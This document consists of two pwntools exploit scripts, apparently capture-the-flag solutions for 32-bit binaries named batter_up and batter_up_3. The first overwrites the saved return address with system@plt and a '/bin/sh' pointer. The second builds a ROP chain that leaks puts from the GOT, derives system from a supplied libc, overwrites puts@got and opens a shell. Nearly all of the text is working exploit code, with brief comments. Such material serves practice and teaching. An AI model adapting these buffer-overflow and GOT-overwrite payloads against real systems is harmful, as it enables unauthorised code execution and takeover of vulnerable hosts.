batter_up

from pwn import *
 
p = process("./batter_up")
elf = ELF("./batter_up")

# Classic ret2plt on a non-PIE 32-bit binary: the saved return address is
# replaced with system@plt, followed by a throw-away return address for
# system() and the pointer to a "/bin/sh" string that lives in the binary.
system = elf.plt['system']
binsh = 0x804874a   # address of "/bin/sh" inside ./batter_up (found by the author; re-check if the binary changes)
OVERFLOW_LEN = 48   # bytes from the start of the buffer up to the saved EIP

print(p.recv())


def build_chain():
    """Return the stack payload: padding, system@plt, fake return, "/bin/sh" pointer."""
    frame = [
        "A" * OVERFLOW_LEN,
        p32(system),
        "DDDD",        # return address of system(); irrelevant once the shell is up
        p32(binsh),    # first (and only) argument to system()
    ]
    return "".join(frame)


payload = build_chain()
p.sendline(payload)

p.interactive()

batter_up 3

from pwn import *
 
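p = process("./batter_up_3")
elf = ELF("./batter_up_3")
lib = ELF("./libc_e3d54f5709190f15a9c51089c70f2069771913c1.so.6")

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets = elf.plt['gets']
bss = elf.bss()
# Gadgets located in the (non-PIE) binary. Only `pr` (pop; ret) is used by
# the chain below; `ppr`/`pppr` are kept for reference.
pr = 0x080483d1
ppr = 0x0804870a
pppr = 0x08048709

# Distance between puts and system in the libc the target runs. Derived from
# the libc we already loaded instead of a hard-coded magic number, so the
# script cannot silently go stale when the libc changes.
# NOTE(review): a local process() uses the host libc, not this file, unless it
# is LD_PRELOADed -- confirm the delta matches the libc actually in use.
PUTS_SYSTEM_DELTA = lib.symbols['puts'] - lib.symbols['system']
OVERFLOW_LEN = 44  # bytes from the start of the buffer up to the saved EIP

p.recv()

# ROP chain; each call is a 3-word frame: target, return address (pop; ret,
# which discards the argument), argument.
#   1. puts(puts@got)  -> leak the resolved libc address of puts
#   2. gets(bss)       -> store "/bin/sh" in writable memory
#   3. puts(bss)       -> echo it back (keeps our I/O in lock-step)
#   4. gets(puts@got)  -> overwrite puts@got with the address of system
#   5. puts(bss)       -> now really system("/bin/sh")
payload = "A" * OVERFLOW_LEN
payload += p32(puts_plt) + p32(pr) + p32(puts_got)
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(puts_plt) + p32(pr) + p32(bss)
payload += p32(gets) + p32(pr) + p32(puts_got)
payload += p32(puts_plt) + "DDDD" + p32(bss)  # final frame: return address is never used

p.sendline(payload)

# recvn(4) blocks for exactly four bytes; recv(4) may return fewer and would
# make u32() raise (or worse, decode a partial leak silently if padded).
libc_puts = u32(p.recvn(4))
log.info("libc_puts = {}".format(hex(libc_puts)))
libc_system = libc_puts - PUTS_SYSTEM_DELTA
log.info("libc_system = {}".format(hex(libc_system)))

# gets() stops at the first '\n', so an address containing a 0x0a byte cannot
# be delivered through it and the GOT overwrite would be truncated.
if "\n" in p32(libc_system):
    log.warning("system address contains 0x0a; gets() will truncate the GOT write")

p.sendline("/bin/sh\x00")   # consumed by gets(bss)
p.sendline(p32(libc_system))  # consumed by gets(puts@got)

p.interactive()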
